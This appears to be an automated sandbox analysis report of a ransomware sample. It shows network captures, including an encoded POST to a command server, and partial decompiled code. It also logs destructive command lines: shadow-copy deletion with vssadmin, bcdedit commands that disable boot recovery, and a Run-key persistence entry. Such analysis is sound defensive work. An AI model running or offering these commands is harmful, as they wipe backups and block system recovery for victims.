May 12, 2016 12:14:17.671806097 CEST	192.168.1.12	8.8.8.8	cf0a	(Port unreachable)	Destination Unreachable
May 12, 2016 12:14:25.672981977 CEST	192.168.1.12	8.8.8.8	cf08	(Port unreachable)	Destination Unreachable
May 12, 2016 12:14:26.674475908 CEST	192.168.1.12	8.8.8.8	cf08	(Port unreachable)	Destination Unreachable
May 12, 2016 12:14:49.671750069 CEST	192.168.1.12	8.8.8.8	cf0e	(Port unreachable)	Destination Unreachable
May 12, 2016 12:14:50.671034098 CEST	192.168.1.12	8.8.8.8	cf0e	(Port unreachable)	Destination Unreachable
May 12, 2016 12:14:58.671508074 CEST	192.168.1.12	8.8.8.8	cf12	(Port unreachable)	Destination Unreachable
May 12, 2016 12:14:59.672230005 CEST	192.168.1.12	8.8.8.8	cf12	(Port unreachable)	Destination Unreachable
May 12, 2016 12:15:07.674082041 CEST	192.168.1.12	8.8.8.8	cf05	(Port unreachable)	Destination Unreachable
May 12, 2016 12:15:08.683958054 CEST	192.168.1.12	8.8.8.8	cf05	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 12, 2016 12:13:16.370547056 CEST	192.168.1.12	8.8.8.8	0x14de	Standard query (0)	ip.tyk.nu	A (IP address)	IN (0x0001)
May 12, 2016 12:13:17.452605963 CEST	192.168.1.12	8.8.8.8	0x14de	Standard query (0)	ip.tyk.nu	A (IP address)	IN (0x0001)
May 12, 2016 12:13:18.452392101 CEST	192.168.1.12	8.8.8.8	0x14de	Standard query (0)	ip.tyk.nu	A (IP address)	IN (0x0001)
May 12, 2016 12:13:24.706521034 CEST	192.168.1.12	8.8.8.8	0x18a6	Standard query (0)	tellambode.com	A (IP address)	IN (0x0001)
May 12, 2016 12:13:25.706561089 CEST	192.168.1.12	8.8.8.8	0x18a6	Standard query (0)	tellambode.com	A (IP address)	IN (0x0001)
May 12, 2016 12:13:26.708539963 CEST	192.168.1.12	8.8.8.8	0x18a6	Standard query (0)	tellambode.com	A (IP address)	IN (0x0001)
May 12, 2016 12:13:48.810797930 CEST	192.168.1.12	8.8.8.8	0x9cb	Standard query (0)	mengzhaoshituan.com	A (IP address)	IN (0x0001)
May 12, 2016 12:13:49.810376883 CEST	192.168.1.12	8.8.8.8	0x9cb	Standard query (0)	mengzhaoshituan.com	A (IP address)	IN (0x0001)
May 12, 2016 12:13:50.810842991 CEST	192.168.1.12	8.8.8.8	0x9cb	Standard query (0)	mengzhaoshituan.com	A (IP address)	IN (0x0001)
May 12, 2016 12:14:12.730741978 CEST	192.168.1.12	8.8.8.8	0x1c25	Standard query (0)	topdrivers.org	A (IP address)	IN (0x0001)
May 12, 2016 12:14:13.730102062 CEST	192.168.1.12	8.8.8.8	0x1c25	Standard query (0)	topdrivers.org	A (IP address)	IN (0x0001)
May 12, 2016 12:14:14.730041981 CEST	192.168.1.12	8.8.8.8	0x1c25	Standard query (0)	topdrivers.org	A (IP address)	IN (0x0001)
May 12, 2016 12:14:21.690054893 CEST	192.168.1.12	8.8.8.8	0xdea6	Standard query (0)	partaci.info	A (IP address)	IN (0x0001)
May 12, 2016 12:14:22.690602064 CEST	192.168.1.12	8.8.8.8	0xdea6	Standard query (0)	partaci.info	A (IP address)	IN (0x0001)
May 12, 2016 12:14:23.690592051 CEST	192.168.1.12	8.8.8.8	0xdea6	Standard query (0)	partaci.info	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	Address	Type	Class
May 12, 2016 12:13:18.673100948 CEST	8.8.8.8	192.168.1.12	0x14de	No error (0)	ip.tyk.nu	144.76.253.225	A (IP address)	IN (0x0001)
May 12, 2016 12:13:19.671772957 CEST	8.8.8.8	192.168.1.12	0x14de	No error (0)	ip.tyk.nu	144.76.253.225	A (IP address)	IN (0x0001)
May 12, 2016 12:13:20.672578096 CEST	8.8.8.8	192.168.1.12	0x14de	No error (0)	ip.tyk.nu	144.76.253.225	A (IP address)	IN (0x0001)
May 12, 2016 12:13:27.673320055 CEST	8.8.8.8	192.168.1.12	0x18a6	No error (0)	tellambode.com	69.73.182.201	A (IP address)	IN (0x0001)
May 12, 2016 12:13:28.671799898 CEST	8.8.8.8	192.168.1.12	0x18a6	No error (0)	tellambode.com	69.73.182.201	A (IP address)	IN (0x0001)
May 12, 2016 12:13:29.672569036 CEST	8.8.8.8	192.168.1.12	0x18a6	No error (0)	tellambode.com	69.73.182.201	A (IP address)	IN (0x0001)
May 12, 2016 12:13:51.671499014 CEST	8.8.8.8	192.168.1.12	0x9cb	No error (0)	mengzhaoshituan.com	182.50.147.1	A (IP address)	IN (0x0001)
May 12, 2016 12:13:52.672102928 CEST	8.8.8.8	192.168.1.12	0x9cb	No error (0)	mengzhaoshituan.com	182.50.147.1	A (IP address)	IN (0x0001)
May 12, 2016 12:13:53.673583984 CEST	8.8.8.8	192.168.1.12	0x9cb	No error (0)	mengzhaoshituan.com	182.50.147.1	A (IP address)	IN (0x0001)
May 12, 2016 12:14:15.673182011 CEST	8.8.8.8	192.168.1.12	0x1c25	No error (0)	topdrivers.org	185.24.99.98	A (IP address)	IN (0x0001)
May 12, 2016 12:14:16.672250032 CEST	8.8.8.8	192.168.1.12	0x1c25	No error (0)	topdrivers.org	185.24.99.98	A (IP address)	IN (0x0001)
May 12, 2016 12:14:17.671446085 CEST	8.8.8.8	192.168.1.12	0x1c25	No error (0)	topdrivers.org	185.24.99.98	A (IP address)	IN (0x0001)
May 12, 2016 12:14:24.673104048 CEST	8.8.8.8	192.168.1.12	0xdea6	No error (0)	partaci.info	176.106.190.60	A (IP address)	IN (0x0001)
May 12, 2016 12:14:25.672816992 CEST	8.8.8.8	192.168.1.12	0xdea6	No error (0)	partaci.info	176.106.190.60	A (IP address)	IN (0x0001)
May 12, 2016 12:14:26.674338102 CEST	8.8.8.8	192.168.1.12	0xdea6	No error (0)	partaci.info	176.106.190.60	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

ip.tyk.nu

topdrivers.org

HTTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Header	Total Bytes Transfered (KB)
May 12, 2016 12:13:18.699160099 CEST	49162	80	192.168.1.12	144.76.253.225	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko Host: ip.tyk.nu	6
May 12, 2016 12:13:24.674092054 CEST	80	49162	144.76.253.225	192.168.1.12	HTTP/1.1 200 OK Server: nginx/1.8.0 Date: Thu, 12 May 2016 10:13:21 GMT Content-Type: text/plain Content-Length: 14 Connection: keep-alive Access-Control-Allow-Origin: * Data Raw: 37 37 2e 32 34 37 2e 31 38 31 2e 31 36 32 Data Ascii: 77.247.181.162	7
May 12, 2016 12:14:15.678674936 CEST	49165	80	192.168.1.12	185.24.99.98	POST /components/com_mailto/views/dbinfo.php HTTP/1.1 Accept: y6 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko Host: topdrivers.org Content-Length: 741 Cache-Control: no-cache Data Raw: 64 61 74 61 3d 41 41 33 38 37 41 32 45 43 44 44 30 45 36 44 44 30 32 44 45 38 43 37 38 36 34 42 32 44 46 32 41 36 43 33 42 42 43 34 35 46 42 34 31 33 33 31 44 43 34 35 46 38 36 34 39 44 42 44 33 36 44 30 45 43 33 34 30 41 39 43 34 32 33 45 35 46 45 45 44 33 39 35 46 39 39 38 38 38 30 36 44 35 42 46 45 33 37 36 36 42 38 34 46 42 42 33 39 32 41 39 34 39 31 30 37 39 43 38 46 33 37 46 39 33 38 34 33 39 46 37 35 38 39 43 30 32 46 41 39 31 42 41 39 44 36 30 30 37 32 37 32 31 38 42 30 30 31 39 34 39 38 39 42 34 32 33 37 46 38 36 36 42 39 35 38 43 34 41 42 35 31 30 34 34 35 42 41 37 37 37 34 37 37 41 38 30 30 42 33 30 35 32 43 43 38 33 33 46 42 32 42 36 38 38 42 38 36 42 33 41 43 46 41 31 36 42 33 39 44 30 30 39 41 31 45 31 45 34 46 35 44 31 44 43 32 34 33 32 37 44 32 34 42 44 32 43 43 42 43 42 36 35 33 30 39 33 45 39 34 35 37 46 39 45 43 45 38 36 46 30 38 42 34 39 37 35 43 39 36 35 32 46 31 42 30 32 32 38 45 45 36 41 35 44 38 45 30 44 35 34 31 45 30 34 41 31 43 45 44 32 38 33 36 41 31 42 37 36 35 45 33 44 31 34 36 45 46 36 44 41 34 41 41 30 41 31 35 44 41 31 30 33 37 39 42 35 36 39 38 36 42 30 41 30 41 46 41 46 37 30 41 36 39 30 41 31 37 35 36 33 39 43 46 32 32 42 37 45 31 46 35 37 32 44 33 37 36 32 37 37 43 42 35 42 46 35 32 37 31 30 38 44 32 38 35 45 34 31 39 46 37 33 30 39 44 34 37 38 42 33 37 42 34 46 41 42 43 32 36 31 46 35 46 39 46 39 34 31 39 46 46 35 36 33 41 45 41 34 45 31 43 32 39 39 34 39 32 42 38 44 44 45 33 36 30 30 42 44 43 33 42 32 33 31 34 32 38 43 39 42 46 39 43 35 46 36 44 31 41 35 34 41 43 43 42 38 45 32 45 32 37 44 30 41 32 31 44 32 37 43 32 35 37 45 44 45 34 30 44 37 37 45 30 44 42 39 35 31 31 36 39 32 36 42 46 34 30 46 46 30 38 46 39 32 46 31 36 32 46 46 33 32 33 38 37 38 32 43 46 39 45 35 33 44 39 39 46 43 41 39 35 36 33 45 41 31 37 44 46 44 35 38 32 32 37 45 32 42 43 37 45 46 36 42 37 38 34 44 31 41 30 44 31 33 31 31 46 32 44 35 46 33 43 46 42 30 42 37 41 37 37 43 37 42 36 42 30 36 46 36 45 42 38 39 41 36 30 42 34 37 33 36 37 30 37 36 31 44 44 37 31 34 37 33 43 32 33 46 34 30 31 33 31 41 45 45 36 37 31 46 31 45 37 41 41 38 39 36 42 39 33 30 42 34 46 43 38 39 45 45 39 45 44 39 34 38 36 43 35 38 42 44 37 42 35 33 39 44 42 35 38 36 44 45 34 33 42 39 38 44 36 42 39 38 39 Data Ascii: data=AA387A2ECDD0E6DD02DE8C7864B2DF2A6C3BBC45FB41331DC45F8649DBD36D0EC340A9C423E5FEED395F9988806D5BFE3766B84FBB392A9491079C8F37F938439F7589C02FA91BA9D600727218B00194989B4237F866B958C4AB510445BA777477A800B3052CC833FB2B688B86B3ACFA16B39D009A1E1E4F5D1DC24327D24BD2CCBCB653093E9457F9ECE86F08B4975C9652F1B0228EE6A5D8E0D541E04A1CED2836A1B765E3D146EF6DA4AA0A15DA10379B56986B0A0AFAF70A690A175639CF22B7E1F572D376277CB5BF527108D285E419F7309D478B37B4FABC261F5F9F9419FF563AEA4E1C299492B8DDE3600BDC3B231428C9BF9C5F6D1A54ACCB8E2E27D0A21D27C257EDE40D77E0DB95116926BF40FF08F92F162FF3238782CF9E53D99FCA9563EA17DFD58227E2BC7EF6B784D1A0D1311F2D5F3CFB0B7A77C7B6B06F6EB89A60B473670761DD71473C23F40131AEE671F1E7AA896B930B4FC89EE9ED9486C58BD7B539DB586DE43B98D6B989	10
May 12, 2016 12:14:21.674299955 CEST	80	49165	185.24.99.98	192.168.1.12	HTTP/1.1 404 Not Found Date: Thu, 12 May 2016 10:14:19 GMT Server: Apache Content-Length: 236 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: DYNSRV=lin238; path=/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 63 6f 6d 5f 6d 61 69 6c 74 6f 2f 76 69 65 77 73 2f 64 62 69 6e 66 6f 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /components/com_mailto/views/dbinfo.php was not found on this server.</p></body></html>	11

Code Manipulations

Statistics

CPU Usage

• 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
• amhfnhe45.exe
• cmd.exe
• reg.exe
• bcdedit.exe
• vssadmin.exe
• svchost.exe
• bcdedit.exe
• bcdedit.exe
• bcdedit.exe
• bcdedit.exe

Click to jump to process

Memory Usage

• 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
• amhfnhe45.exe
• cmd.exe
• reg.exe
• bcdedit.exe
• vssadmin.exe
• svchost.exe
• bcdedit.exe
• bcdedit.exe
• bcdedit.exe
• bcdedit.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry
• Network

Click to dive into process behavior distribution

Behavior

• 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
• amhfnhe45.exe
• cmd.exe
• reg.exe
• bcdedit.exe
• vssadmin.exe
• svchost.exe
• bcdedit.exe
• bcdedit.exe
• bcdedit.exe
• bcdedit.exe

Click to jump to process

System Behavior

Analysis Process: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe PID: 2732 Parent PID: 2388

General

Start time:	12:12:52
Start date:	12/05/2016
Path:	C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Wow64 process (32bit):	false
Commandline:	unknown
Imagebase:	0x400000
File size:	287232 bytes
MD5 hash:	61F847BCB69D0FE86AD7A4BA3F057BE5
Programmed in:	C, C++ or other language

Show windows behavior

File Activities

File Opened

File Created

File Written

File Read

Other File Operations

Section Activities

Section loaded by Windows

Process Activities

Process Created

Process Terminated

Show windows behavior

Thread Activities

Thread Delayed

Show windows behavior

Memory Activities

Memory Allocated

Memory Protection Changed

Memory Usage Statistics

Show windows behavior

System Activities

Language or Local ID Queried

Show windows behavior

Timing Activities

Show windows behavior

Windows UI Activities

Show windows behavior

Process Token Activities

Token Adjusted

Show windows behavior

LPC Port Activities

Chronological Activities

Analysis Process: amhfnhe45.exe PID: 2748 Parent PID: 2732

General

Start time:	12:12:54
Start date:	12/05/2016
Path:	C:\Users\admin\AppData\Roaming\amhfnhe45.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\admin\AppData\Roaming\amhfnhe45.exe
Imagebase:	0x76330000
File size:	287232 bytes
MD5 hash:	61F847BCB69D0FE86AD7A4BA3F057BE5
Programmed in:	C, C++ or other language

Show windows behavior

File Activities

File Opened

File Created

File Moved

File Written

File Read

Directory Queried

Other File Operations

Volume Information Queried

Device IO

Section Activities

Section loaded by Windows

Section loaded by Program

Show windows behavior

Registry Activities

Key Opened

Key Created

Key Value Created

Key Value Queried

Show windows behavior

Mutex Activities

Mutex Created

Show windows behavior

Process Activities

Process Created

Process Queried

Show windows behavior

Thread Activities

Thread Created

Thread Delayed

Show windows behavior

Memory Activities

Memory Allocated

Memory Protection Changed

Memory Usage Statistics

Show windows behavior

System Activities

Language or Local ID Queried

System Information Queried

Show windows behavior

Timing Activities

Show windows behavior

Windows UI Activities

Show windows behavior

Network Activities

Socket bound

Socket connected

Show windows behavior

Process Token Activities

Token Adjusted

Show windows behavior

LPC Port Activities

Chronological Activities

Analysis Process: cmd.exe PID: 2776 Parent PID: 2732

General

Start time:	12:12:57
Start date:	12/05/2016
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c DEL C:\94-61F~1.EXE
Imagebase:	0x4a5f0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Show windows behavior

Memory Activities

Memory Usage Statistics

Chronological Activities

Analysis Process: reg.exe PID: 2816 Parent PID: 2748

General

Start time:	12:12:58
Start date:	12/05/2016
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v game342 /t REG_SZ /d C:\Users\admin\AppData\Roaming\amhfnhe45.exe /f
Imagebase:	0x77ca0000
File size:	62464 bytes
MD5 hash:	D69A9ABBB0D795F21995C2F48C1EB560
Programmed in:	C, C++ or other language

Show windows behavior

Memory Activities

Memory Usage Statistics

Chronological Activities

Analysis Process: bcdedit.exe PID: 2952 Parent PID: 2748

General

Start time:	12:13:01
Start date:	12/05/2016
Path:	C:\Windows\System32\bcdedit.exe
Wow64 process (32bit):	false
Commandline:	bcdedit.exe /set {current} bootems off
Imagebase:	0x8b0000
File size:	295424 bytes
MD5 hash:	9473C7BDD77A204C0BB70B467740D326
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: vssadmin.exe PID: 2984 Parent PID: 2748

General

Start time:	12:13:01
Start date:	12/05/2016
Path:	C:\Windows\System32\vssadmin.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\vssadmin.exe delete shadows /all /Quiet
Imagebase:	0x70000
File size:	115200 bytes
MD5 hash:	6E248A3D528EDE43994457CF417BD665
Programmed in:	C, C++ or other language

Show windows behavior

Memory Activities

Memory Usage Statistics

Chronological Activities

Analysis Process: svchost.exe PID: 3056 Parent PID: 404

General

Start time:	12:13:02
Start date:	12/05/2016
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	unknown
Imagebase:	0x77ca0000
File size:	20992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Programmed in:	C, C++ or other language

Show windows behavior

Memory Activities

Memory Usage Statistics

Chronological Activities

Analysis Process: bcdedit.exe PID: 3088 Parent PID: 2748

General

Start time:	12:13:02
Start date:	12/05/2016
Path:	C:\Windows\System32\bcdedit.exe
Wow64 process (32bit):	false
Commandline:	bcdedit.exe /set {current} advancedoptions off
Imagebase:	0xf40000
File size:	295424 bytes
MD5 hash:	9473C7BDD77A204C0BB70B467740D326
Programmed in:	C, C++ or other language

Show windows behavior

Memory Activities

Memory Usage Statistics

Chronological Activities

Analysis Process: bcdedit.exe PID: 3116 Parent PID: 2748

General

Start time:	12:13:04
Start date:	12/05/2016
Path:	C:\Windows\System32\bcdedit.exe
Wow64 process (32bit):	false
Commandline:	bcdedit.exe /set {current} optionsedit off
Imagebase:	0x770000
File size:	295424 bytes
MD5 hash:	9473C7BDD77A204C0BB70B467740D326
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: bcdedit.exe PID: 3140 Parent PID: 2748

General

Start time:	12:13:05
Start date:	12/05/2016
Path:	C:\Windows\System32\bcdedit.exe
Wow64 process (32bit):	false
Commandline:	bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
Imagebase:	0x7d0000
File size:	295424 bytes
MD5 hash:	9473C7BDD77A204C0BB70B467740D326
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: bcdedit.exe PID: 3164 Parent PID: 2748

General

Start time:	12:13:06
Start date:	12/05/2016
Path:	C:\Windows\System32\bcdedit.exe
Wow64 process (32bit):	false
Commandline:	bcdedit.exe /set {current} recoveryenabled off
Imagebase:	0xde0000
File size:	295424 bytes
MD5 hash:	9473C7BDD77A204C0BB70B467740D326
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Analysis Process: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe PID: 2732 Parent PID: 2388

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	1%
Signature Coverage:	8.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	39

Entrypoint
Key Decision
Dynamic/Decrypted
Unpacker/Decrypter
Executed
Not Executed
Unknown
Signature Matched
Richest Path
Thread / callback entry
Thread / callback creation
Show Help

Hide legend

Hide Nodes/Edges

Executed Functions

Function 0041F040, Relevance: 103.9, APIs: 28, Strings: 31, Instructions: 620

C-Code - Quality: 53%

			E0041F040(void* __eflags, long _a4, void* _a8, struct _LUID _a32, char _a60, char _a61, char _a116, intOrPtr _a184, intOrPtr _a188, long _a192, char _a196, char _a220, char _a240, char _a252, char _a284, long _a288, intOrPtr _a292, intOrPtr _a296, struct _SID_IDENTIFIER_AUTHORITY _a300, char _a304, intOrPtr _a306, intOrPtr _a310, intOrPtr _a314, intOrPtr _a318, short _a322, char _a532, char _a534, signed int _a8740, signed int _a8752, signed int _a8908, signed int _a8916, signed int _a9020) {
				void* _v4;
				long _v8;
				void* _v20;
				char _v24;
				intOrPtr* _v40;
				intOrPtr _v44;
				char _v62;
				char _v64;
				char _v72;
				char _v80;
				intOrPtr* _v84;
				char _v88;
				intOrPtr* _v100;
				char _v104;
				intOrPtr* _v108;
				intOrPtr* _v116;
				intOrPtr* _v124;
				intOrPtr* _v132;
				long _v260;
				char _v272;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t99;
				int _t103;
				intOrPtr* _t110;
				intOrPtr* _t114;
				intOrPtr* _t117;
				intOrPtr* _t123;
				intOrPtr* _t127;
				intOrPtr* _t132;
				intOrPtr* _t135;
				intOrPtr* _t138;
				struct HINSTANCE__* _t143;
				_Unknown_base(*)()* _t145;
				intOrPtr _t160;
				int _t161;
				void* _t162;
				signed int _t163;
				intOrPtr* _t164;
				long _t166;
				signed int _t183;
				signed int _t186;
				intOrPtr* _t191;
				void* _t213;
				long _t218;
				signed int _t219;
				void* _t227;
				void* _t231;
				void* _t232;
				void* _t234;
				void* _t236;
				void* _t237;
				intOrPtr* _t245;
				intOrPtr _t253;
				intOrPtr _t255;
				char* _t256;
				intOrPtr _t282;
				intOrPtr _t292;
				intOrPtr* _t295;
				intOrPtr* _t296;
				void* _t297;
				void* _t298;
				struct HINSTANCE__* _t299;
				struct HINSTANCE__* _t300;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t306;
				void* _t307;
				signed char* _t308;
				void* _t309;
				void* _t310;
				void* _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				signed int _t315;
				void* _t320;
				signed int _t321;
				void* _t329;
				void* _t330;
				void* _t363;

				_t313 = _t312 & 0xfffffff8;
				E0042E220(0x2344);
				_t99 =  *0x43f054; // 0xd46ffb00
				_a9020 = _t99 ^ _t313;
				E004205E0(); // executed
				_a4 = 0;
				_a300.Value = 0;
				_a304 = 0x500;
				_t103 = AllocateAndInitializeSid( &_a300, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_a8);
				_a4 = _t103;
				if(_t103 != 0) {
					_t227 = _a8;
					__imp__CheckTokenMembership(0, _t227,  &_a4);
					if(_t227 == 0) {
						_v8 = 0;
					}
					FreeSid(_v4);
					_t103 = _v8;
				}
				_t305 = __imp__SHGetFolderPathW;
				 *0x482238 = _t103; // executed
				 *_t305(0, 0x1a, 0, 0, "C:\Users\admin\AppData\Roaming"); // executed
				_a306 = 0;
				_a310 = 0;
				_a314 = 0;
				_a318 = 0;
				_a322 = 0;
				_a304 = 0;
				E004233D0( &_a304, 9);
				_t295 = __imp__CoCreateInstance; // 0x76de9d0b
				_t314 = _t313 + 8;
				_v20 = 0;
				_v24 = 0;
				_a288 = 0;
				_a292 = 0;
				_a296 = 0;
				_a300.Value = 0;
				 *_t295(0x43b924, 0, 1, 0x4312c8,  &_v20); // executed
				_t110 = _v40;
				_push( &_a284);
				_push(0);
				_push(_t110);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0xc))))() != 0x80004003) {
					ExitProcess(0xffffffff);
				}
				 *_t295(0x43b934, 0, 1, 0x4312b8,  &_v24); // executed
				_t114 = _v72;
				 *((intOrPtr*)( *((intOrPtr*)( *_t114 + 0xc))))(_t114, _v44,  &_a252);
				_t117 = _v84;
				 *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x18))))(_t117,  &_a240,  &_v88);
				_t296 = _v100;
				if(_t296 == 0) {
					ExitProcess(1);
				}
				_v64 = 0;
				E0042D0A0( &_v62, 0, 0xfe);
				_t315 = _t314 + 0xc;
				_a192 = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *_t296 + 0x30))))(_t296,  &_v64);
				_t245 =  &_v72;
				_t123 =  &_a220;
				while(1) {
					_t276 =  *_t123;
					if(_t276 !=  *_t245) {
						break;
					}
					if(_t276 == 0) {
						L13:
						_t123 = 0;
					} else {
						_t276 =  *((intOrPtr*)(_t123 + 2));
						if(_t276 !=  *((intOrPtr*)(_t245 + 2))) {
							break;
						} else {
							_t123 = _t123 + 4;
							_t245 = _t245 + 4;
							if(_t276 != 0) {
								continue;
							} else {
								goto L13;
							}
						}
					}
					L15:
					if(_t123 != 0 || _a184 != _v104) {
						L50:
						_pop(_t297);
						_pop(_t306);
						_pop(_t231);
						__eflags = 0;
						return E004256FE(0, _t231, _a8916 ^ _t315, _t276, _t297, _t306);
					} else {
						_t127 = _v108;
						_t277 =  &_v80;
						_push( &_v80);
						_push(_t127);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t127 + 0x24))))() != 0 || _v88 != 0) {
							L35:
							_pop(_t298);
							_pop(_t307);
							_pop(_t232);
							return E004256FE(1, _t232, _a8908 ^ _t315, _t277, _t298, _t307);
						} else {
							_t132 = _v116;
							 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0xc))))(_t132,  &_a196);
							if(_a188 == 0) {
								E00426928(1);
							}
							_t135 = _v124;
							_v104 = 0;
							if(_t135 == 0) {
								_t135 = E00426928(0xffffffff);
							}
							_push( &_v104);
							_push(_t135);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t135 + 0x28))))() != 0) {
								E00426928(0xffffffff);
							}
							_t138 = _v132;
							_t253 =  *_t138;
							_t280 =  *((intOrPtr*)(_t253 + 4));
							_push(_t138);
							if( *((intOrPtr*)( *((intOrPtr*)(_t253 + 4))))() == 0) {
								E00426928(0xffffffff);
							}
							_t299 = LoadLibraryW(L"Shell32.dll");
							LoadStringW(_t299, 0x5509, "Desktop", 0xff); // executed
							LoadStringW(_t299, 0x5527, "Public Desktop", 0xff);
							_t143 = GetModuleHandleW(L"KERNEL32");
							_t234 = GetProcAddress;
							_t300 = _t143;
							 *0x48223c = GetProcAddress(_t300, "Wow64DisableWow64FsRedirection");
							_t145 = GetProcAddress(_t300, "Wow64RevertWow64FsRedirection");
							 *0x482240 = _t145; // executed
							 *_t305(0, 0x24, 0, 0, "C:\Windows"); // executed
							 *_t305(0, 0x26, 0, 0, "C:\Program Files"); // executed
							 *_t305(0, 0x3b, 0, 0, "C:\Users\admin\AppData\Local\Microsoft\Windows\Burn\Burn"); // executed
							__imp__SHGetSpecialFolderPathW(0, "C:\Users\admin\Documents\recover_file_yddmbpomp.txt", 5, 0); // executed
							E00425ACD("C:\Users\admin\Documents\recover_file_yddmbpomp.txt", 0x1000, L"\\recover_file_");
							E00425ACD("C:\Users\admin\Documents\recover_file_yddmbpomp.txt", 0x1000,  &_a116);
							E00425ACD("C:\Users\admin\Documents\recover_file_yddmbpomp.txt", 0x1000, L".txt");
							 *_t305(0, 0x10, 0, 0, "C:\Users\admin\Desktop"); // executed
							 *_t305(0, 0x19, 0, 0, "C:\Users\Public\Desktop"); // executed
							 *_t305(0, 0x23, 0, 0, "C:\ProgramData"); // executed
							GetModuleFileNameW(0, "C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe", 0x1000);
							E0042623B("C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe:Zone.Identifier", 0x1000, "C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe");
							E00425ACD("C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe:Zone.Identifier", 0x1000, L":Zone.Identifier");
							_t320 = _t315 + 0x3c;
							DeleteFileW("C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe:Zone.Identifier"); // executed
							_t160 = E00420160(); // executed
							 *0x462860 = _t160; // executed
							_t161 = LookupPrivilegeValueA(0, "SeDebugPrivilege",  &_a32); // executed
							if(_t161 != 0) {
								_t305 =  &_a32;
								E004201F0(_t280,  &_a32); // executed
							}
							_t277 =  &_v260;
							_t162 = E0041F9D0( &_v260); // executed
							_t315 = _t320 + 4;
							if(_t162 == 0) {
								_t163 = E0041FAE0(_t234, __eflags);
								__eflags = _t163;
								if(_t163 != 0) {
									goto L35;
								} else {
									goto L41;
								}
							} else {
								_t218 = _v260;
								_t363 = _t218 - 0x2000;
								if(_t363 > 0) {
									__eflags = _t218 - 0x3000;
									if(__eflags == 0) {
										goto L38;
									} else {
										__eflags = _t218 - 0x4000;
										if(__eflags != 0) {
											goto L41;
										} else {
											goto L38;
										}
									}
								} else {
									if(_t363 == 0) {
										L38:
										_t219 = E0041FAE0(_t234, __eflags); // executed
										__eflags = _t219;
										if(_t219 == 0) {
											goto L41;
										} else {
											_pop(_t303);
											_pop(_t311);
											_pop(_t237);
											__eflags = _a8752 ^ _t315;
											return E004256FE(1, _t237, _a8752 ^ _t315, _t277, _t303, _t311);
										}
									} else {
										if(_t218 == 0 || _t218 == 0x1000) {
											E0041E880();
											goto L35;
										} else {
											L41:
											_t164 = E00413000(_t277, 0, 1, 0xbf78968a);
											_t321 = _t315 + 0xc;
											 *_t164(0, 0, L"12393578327533451");
